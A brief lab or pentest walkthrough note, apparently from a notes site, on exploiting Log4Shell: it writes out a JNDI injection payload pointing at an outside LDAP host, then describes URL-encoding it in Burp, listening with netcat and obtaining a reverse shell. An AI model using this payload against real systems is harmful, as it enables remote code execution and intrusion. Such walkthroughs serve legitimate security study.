πŸ¦ͺLog4Shell

Check this articlearrow-up-right for more info To check for Log4Shell exploit :

${jndi:ldap://10.8.0.178:4444/a}

Then url encode it and send through burp after intercepting:

Listening on nc:

We get some weird characters back.

Then we can use a log4j-shellarrow-up-right Download javaarrow-up-right and execute

Then send the payload:

Sending the url encoded payload in burpsuite.

Now we get a shell back:

Last updated

Was this helpful?